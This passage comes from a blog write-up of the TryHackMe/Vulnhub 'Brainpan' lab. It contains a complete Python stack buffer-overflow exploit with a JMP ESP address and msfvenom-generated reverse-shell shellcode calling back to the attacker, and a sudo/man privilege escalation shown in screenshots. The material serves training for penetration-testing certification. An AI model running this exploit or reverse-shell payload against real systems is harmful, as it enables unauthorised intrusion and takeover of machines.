<span class="nb">buffer</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="n">offset</span> <span class="o">+</span> <span class="sa">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">4</span> <span class="o">+</span> <span class="n">badchars</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">'127.0.0.1'</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">9999</span>

<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
<span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">((</span><span class="sa">b</span><span class="s">"                          &gt;&gt; "</span> <span class="o">+</span> <span class="nb">buffer</span><span class="p">))</span>
<span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
</pre></table></code></div></div><p>To inspect the program’s memory I attached the <code class="language-plaintext highlighter-rouge">brainpan</code> process to <code class="language-plaintext highlighter-rouge">ollydbg</code> on my Kali machine as follows:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/follow-in-dump.png" alt="" /></p><p>All the characters are here (there are no bad characters):</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/dump.png" alt="" /></p><h3 id="step-4-finding-jmp-esp">Step 4: Finding <code class="language-plaintext highlighter-rouge">JMP ESP</code></h3><p>Before continuing, we need to find a <code class="language-plaintext highlighter-rouge">jmp esp</code> instruction to redirect the execution flow at the start of our payload/shellcode.</p><blockquote><p><a href="https://security.stackexchange.com/questions/157478/why-jmp-esp-instead-of-directly-jumping-into-the-stack">Why JMP ESP instead of directly jumping into the stack?</a></p></blockquote><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/ollydbg-search-for.png" alt="" /></p><p>Using <code class="language-plaintext highlighter-rouge">ollydbg</code>, I found the following address:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/JMP_ESP.png" alt="" /></p><p>However, to ensure it was the correct address I ran <code class="language-plaintext highlighter-rouge">brainpan.exe</code> on a Windows VM and inspected it using <strong>Immunity Debugger</strong> and <code class="language-plaintext highlighter-rouge">mona.py</code> (as explained on this <a href="https://www.youtube.com/watch?v=k9D9RuFT02I&amp;list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G&amp;index=7">video</a>):</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/mona-brainpan.png" alt="" /></p><p>The address I got was <code class="language-plaintext highlighter-rouge">0x311712F3</code>.</p><h3 id="step-5-generating-shellcode">Step 5: Generating shellcode</h3><p>To generate a shellcode we can use <code class="language-plaintext highlighter-rouge">msfvenom</code>:</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre><td class="rouge-code"><pre><span class="nv">$ </span>msfvenom <span class="nt">-p</span> linux/x86/shell_reverse_tcp <span class="nv">lhost</span><span class="o">=</span><span class="si">$(</span>vpnip<span class="si">)</span> <span class="nv">lport</span><span class="o">=</span>4444 <span class="nt">--format</span> python <span class="nt">--bad-chars</span> <span class="s2">"</span><span class="se">\x</span><span class="s2">00"</span> <span class="nt">--var-name</span> shellcode
<span class="o">[</span>-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
<span class="o">[</span>-] No <span class="nb">arch </span>selected, selecting <span class="nb">arch</span>: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 <span class="o">(</span><span class="nv">iteration</span><span class="o">=</span>0<span class="o">)</span>
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 550 bytes
shellcode <span class="o">=</span>  b<span class="s2">""</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">ba</span><span class="se">\x</span><span class="s2">9d</span><span class="se">\x</span><span class="s2">29</span><span class="se">\x</span><span class="s2">7f</span><span class="se">\x</span><span class="s2">fa</span><span class="se">\x</span><span class="s2">dd</span><span class="se">\x</span><span class="s2">c4</span><span class="se">\x</span><span class="s2">d9</span><span class="se">\x</span><span class="s2">74</span><span class="se">\x</span><span class="s2">24</span><span class="se">\x</span><span class="s2">f4"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">58</span><span class="se">\x</span><span class="s2">33</span><span class="se">\x</span><span class="s2">c9</span><span class="se">\x</span><span class="s2">b1</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">31</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">12</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">50</span><span class="se">\x</span><span class="s2">12"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">83</span><span class="se">\x</span><span class="s2">75</span><span class="se">\x</span><span class="s2">d5</span><span class="se">\x</span><span class="s2">9d</span><span class="se">\x</span><span class="s2">0f</span><span class="se">\x</span><span class="s2">b4</span><span class="se">\x</span><span class="s2">fd</span><span class="se">\x</span><span class="s2">95</span><span class="se">\x</span><span class="s2">13</span><span class="se">\x</span><span class="s2">e5</span><span class="se">\x</span><span class="s2">42"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">09</span><span class="se">\x</span><span class="s2">be</span><span class="se">\x</span><span class="s2">0b</span><span class="se">\x</span><span class="s2">cc</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">8e</span><span class="se">\x</span><span class="s2">6d</span><span class="se">\x</span><span class="s2">03</span><span class="se">\x</span><span class="s2">0e</span><span class="se">\x</span><span class="s2">7c</span><span class="se">\x</span><span class="s2">28"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">2b</span><span class="se">\x</span><span class="s2">30</span><span class="se">\x</span><span class="s2">4e</span><span class="se">\x</span><span class="s2">4a</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">36</span><span class="se">\x</span><span class="s2">a9</span><span class="se">\x</span><span class="s2">22</span><span class="se">\x</span><span class="s2">9f</span><span class="se">\x</span><span class="s2">c3</span><span class="se">\x</span><span class="s2">6a"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">21</span><span class="se">\x</span><span class="s2">f7</span><span class="se">\x</span><span class="s2">d1</span><span class="se">\x</span><span class="s2">6c</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">54</span><span class="se">\x</span><span class="s2">5f</span><span class="se">\x</span><span class="s2">8d</span><span class="se">\x</span><span class="s2">e6</span><span class="se">\x</span><span class="s2">02</span><span class="se">\x</span><span class="s2">0f"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">1f</span><span class="se">\x</span><span class="s2">55</span><span class="se">\x</span><span class="s2">78</span><span class="se">\x</span><span class="s2">ac</span><span class="se">\x</span><span class="s2">16</span><span class="se">\x</span><span class="s2">b8</span><span class="se">\x</span><span class="s2">b3</span><span class="se">\x</span><span class="s2">33</span><span class="se">\x</span><span class="s2">7a</span><span class="se">\x</span><span class="s2">52</span><span class="se">\x</span><span class="s2">22"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">1b</span><span class="se">\x</span><span class="s2">08</span><span class="se">\x</span><span class="s2">ca</span><span class="se">\x</span><span class="s2">d2</span><span class="se">\x</span><span class="s2">4c</span><span class="se">\x</span><span class="s2">c1</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">4a</span><span class="se">\x</span><span class="s2">1a</span><span class="se">\x</span><span class="s2">fe</span><span class="se">\x</span><span class="s2">3e"</span>
shellcode +<span class="o">=</span> b<span class="s2">"</span><span class="se">\x</span><span class="s2">df</span><span class="se">\x</span><span class="s2">95</span><span class="se">\x</span><span class="s2">e0</span><span class="se">\x</span><span class="s2">0e</span><span class="se">\x</span><span class="s2">d4</span><span class="se">\x</span><span class="s2">68</span><span class="se">\x</span><span class="s2">62"</span>
</pre></table></code></div></div><blockquote><p><strong>Note</strong>: First I thought the target was a Windows machine and I used a <code class="language-plaintext highlighter-rouge">windows/shell_reverse_tcp</code> payload. Surprisingly, it worked and I got a Windows shell (<code class="language-plaintext highlighter-rouge">Z:\home\puck&gt;</code>)…very weird! (need to figure out)</p></blockquote><h3 id="step-6-writing-final-exploit">Step 6: Writing final exploit</h3><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">pwn</span>

<span class="n">shellcode</span> <span class="o">=</span>  <span class="sa">b</span><span class="s">""</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xba\x9d\x29\x7f\xfa\xdd\xc4\xd9\x74\x24\xf4</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x58\x33\xc9\xb1\x12\x31\x50\x12\x03\x50\x12</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x83\x75\xd5\x9d\x0f\xb4\xfd\x95\x13\xe5\x42</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x09\xbe\x0b\xcc\x4c\x8e\x6d\x03\x0e\x7c\x28</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x2b\x30\x4e\x4a\x02\x36\xa9\x22\x9f\xc3\x6a</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x21\xf7\xd1\x6c\x54\x54\x5f\x8d\xe6\x02\x0f</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x1f\x55\x78\xac\x16\xb8\xb3\x33\x7a\x52\x22</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x1b\x08\xca\xd2\x4c\xc1\x68\x4a\x1a\xfe\x3e</span><span class="s">"</span>
<span class="n">shellcode</span> <span class="o">+=</span> <span class="sa">b</span><span class="s">"</span><span class="se">\xdf\x95\xe0\x0e\xd4\x68\x62</span><span class="s">"</span>

<span class="n">jmp_esp</span> <span class="o">=</span> <span class="mh">0x311712F3</span> <span class="c1">#0x7BCCE5D9
</span><span class="n">offset</span> <span class="o">=</span> <span class="mi">495</span>
<span class="nb">buffer</span> <span class="o">=</span> <span class="sa">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="n">offset</span> <span class="o">+</span> <span class="n">pwn</span><span class="p">.</span><span class="n">p32</span><span class="p">(</span><span class="n">jmp_esp</span><span class="p">)</span> <span class="o">+</span> <span class="sa">b</span><span class="s">"</span><span class="se">\x90</span><span class="s">"</span> <span class="o">*</span> <span class="mi">32</span> <span class="o">+</span> <span class="n">shellcode</span>

<span class="n">target</span> <span class="o">=</span> <span class="s">'10.10.92.146'</span>
<span class="c1">#target = '127.0.0.1'
</span><span class="n">port</span> <span class="o">=</span> <span class="mi">9999</span>

<span class="k">try</span><span class="p">:</span>
    <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
    <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">((</span><span class="sa">b</span><span class="s">"                          &gt;&gt; "</span> <span class="o">+</span> <span class="nb">buffer</span><span class="p">))</span>
    <span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">except</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"Error connecting to the server..."</span><span class="p">)</span>
</pre></table></code></div></div><p>And we got a shell as <strong>puck</strong>:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/shell2.png" alt="" /></p><hr /><h2 id="privesc">Privesc</h2><h3 id="upgrade-shell">Upgrade shell</h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/upgrade-shell.png" alt="" /></p><h3 id="inspecting-home">Inspecting <code class="language-plaintext highlighter-rouge">/home</code></h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/checksrv.png" alt="" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/home.png" alt="" /></p><h3 id="upload-linpeas">Upload <code class="language-plaintext highlighter-rouge">Linpeas</code></h3><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/getting_linpeas1.png" alt="" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/getting_linpeas2.png" alt="" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/cronjob.png" alt="" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/sudo_l.png" alt="" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/anansi_util.png" alt="" /></p><p>With the program that we can run with <code class="language-plaintext highlighter-rouge">sudo</code>, we can open manual pages.</p><p>The program certainly rely on the <code class="language-plaintext highlighter-rouge">man</code> command so I looked for <strong>GTFOBins man</strong> and this is what I found:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/gtfobins_man.png" alt="" /></p><p>Indeed, it worked, we own root:</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/privesc_payload.png" alt="" /></p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 " data-src="/assets/img/thm/linux/brainpan/privesc.png" alt="" /></p><hr /><h2 id="useful-resources">Useful resources</h2><ul><li><a href="https://www.youtube.com/playlist?list=PLLKT__MCUeix3O0DPbmuaRuR_4Hxo4m3G">The Cyber Mentor - Buffer Overflows Made Easy</a></li><li><a href="https://www.immunityinc.com/products/debugger/">Immunity Debugger</a></li><li><a href="https://github.com/corelan/mona/blob/master/mona.py">Mona.py</a></li><li><a href="https://gtfobins.github.io/gtfobins/man/">GTFOBins - man</a></li></ul></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/tryhackme-walkthroughs/'>TryHackMe walkthroughs</a>, <a href='/categories/linux/'>Linux</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/thm-linux/" class="post-tag no-text-decoration" >thm-linux</a> <a href="/tags/writeup/" class="post-tag no-text-decoration" >writeup</a> <a href="/tags/oscp-prep/" class="post-tag no-text-decoration" >oscp-prep</a> <a href="/tags/dirb/" class="post-tag no-text-decoration" >dirb</a> <a href="/tags/pe32/" class="post-tag no-text-decoration" >PE32</a> <a href="/tags/buffer-overflow/" class="post-tag no-text-decoration" >buffer overflow</a> <a href="/tags/pwn/" class="post-tag no-text-decoration" >pwn</a> <a href="/tags/pattern_create.rb/" class="post-tag no-text-decoration" >pattern_create.rb</a> <a href="/tags/pattern_offset.rb/" class="post-tag no-text-decoration" >pattern_offset.rb</a> <a href="/tags/mona.py/" class="post-tag no-text-decoration" >mona.py</a> <a href="/tags/immunity-debugger/" class="post-tag no-text-decoration" >Immunity Debugger</a> <a href="/tags/wine/" class="post-tag no-text-decoration" >wine</a> <a href="/tags/ollydbg/" class="post-tag no-text-decoration" >ollydbg</a> <a href="/tags/jmp-esp/" class="post-tag no-text-decoration" >jmp esp</a> <a href="/tags/fuzzing/" class="post-tag no-text-decoration" >fuzzing</a> <a href="/tags/msfvenom/" class="post-tag no-text-decoration" >msfvenom</a> <a href="/tags/shellcode/" class="post-tag no-text-decoration" >shellcode</a> <a href="/tags/sudo-misconfiguration/" class="post-tag no-text-decoration" >sudo misconfiguration</a> <a href="/tags/gtfobins/" class="post-tag no-text-decoration" >GTFOBins</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=TryHackMe/Vulnhub - Brainpan - amirr0r&url=https://amirr0r.github.io/posts/thm-brainpan/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=TryHackMe/Vulnhub - Brainpan - amirr0r&u=https://amirr0r.github.io/posts/thm-brainpan/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=TryHackMe/Vulnhub - Brainpan - amirr0r&url=https://amirr0r.github.io/posts/thm-brainpan/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"><h3 data-toc-skip>Recent Update</h3><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/crto-review/">CRTO Review (Certified Red Team Operator) & Notion Templates</a></li><li><a href="/posts/htb-forest/">HackTheBox - Forest</a></li><li><a href="/posts/oscp-review/">OSCP Review (Cheat Sheet, Tmux Enumeration Scripts and Notion Templates)</a></li><li><a href="/posts/oscp-prep/">How do I prepare for the OSCP?</a></li><li><a href="/posts/htb-valentine/">HackTheBox - Valentine</a></li></ul></div><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-2">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Recommend the other 3 posts according to the tags and categories of the current post, if the number is not enough, use the other latest posts to supplement. v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT License --><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/thm-brainstorm/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Aug 10, 2021 <i class="unloaded">2021-08-10T19:55:11+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>TryHackMe - Brainstorm</h3><div class="text-muted small"><p> Brainstorm is a TryHackMe room that consists in reversing a chat program and exploiting a buffer overflow on a remote Windows machine. Enumeration 1 2 3 4 5 $ nmap -Pn -oN ports.txt 10.10.70.196 ...</p></div></div></a></div><div class="card"> <a href="/posts/htb-buff/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Sep 7, 2021 <i class="unloaded">2021-09-07T01:49:17+02:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Buff</h3><div class="text-muted small"><p> Enumeration nmap scan 1 2 3 4 5 6 7 8 9 10 11 $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Buff-full-port-scan.txt 10.10.10.198 Nmap scan report for 10.10.10.198 Host is up (0.18s latenc...</p></div></div></a></div><div class="card"> <a href="/posts/htb-shocker/"><div class="card-body"> <!-- Date format snippet v2.4.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --> <span class="timeago small" > Dec 23, 2020 <i class="unloaded">2020-12-23T13:32:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox - Shocker</h3><div class="text-muted small"><p> Foothold nmap scan $ nmap -min-rate 5000 --max-retries 1 -sV -sC -p- -oN Shocker-full-port-scan.txt 10.10.10.56 Nmap scan report for 10.10.10.56 Host is up (0.099s latency). Not shown: 65532 clo...</p></div></div></a></div></div></div><!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/cotes2020/jekyll-theme-chirpy © 2020 Cotes Chung MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/thm-attacking-kerberos/" class="btn btn-outline-primary"><p>TryHackMe - Attacking Kerberos</p></a> <a href="/posts/thm-brainstorm/" class="btn btn-outline-primary"><p>TryHackMe - Brainstorm</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung MIT License --><div id="disqus" class="pt-2 pb-2"><p class="font-italic text-center text-muted small"> Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script src="/assets/js/lib/jquery.disqusloader.min.js"></script> <script> var options = { scriptUrl: '//amirr0r-github-io.disqus.com/embed.js', disqusConfig: function() { this.page.url = 'https://amirr0r.github.io/posts/thm-brainpan/'; this.page.identifier = '/posts/thm-brainpan/'; } }; $.disqusLoader('#disqus', options); </script></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://github.com/amirr0r">amirr0r</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/msfvenom/">msfvenom</a> <a class="post-tag" href="/tags/sudo-misconfiguration/">sudo misconfiguration</a> <a class="post-tag" href="/tags/password-cracking/">password cracking</a> <a class="post-tag" href="/tags/pwn/">pwn</a> <a class="post-tag" href="/tags/meterpreter/">meterpreter</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/gtfobins/">GTFOBins</a> <a class="post-tag" href="/tags/searchsploit/">searchsploit</a> <a class="post-tag" href="/tags/john-the-ripper/">John The Ripper</a> <a class="post-tag" href="/tags/powershell/">powershell</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- The GA snippet v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga'); ga('create', '', 'auto'); ga('send', 'pageview'); </script> <!-- Jekyll Simple Search loader v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://amirr0r.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
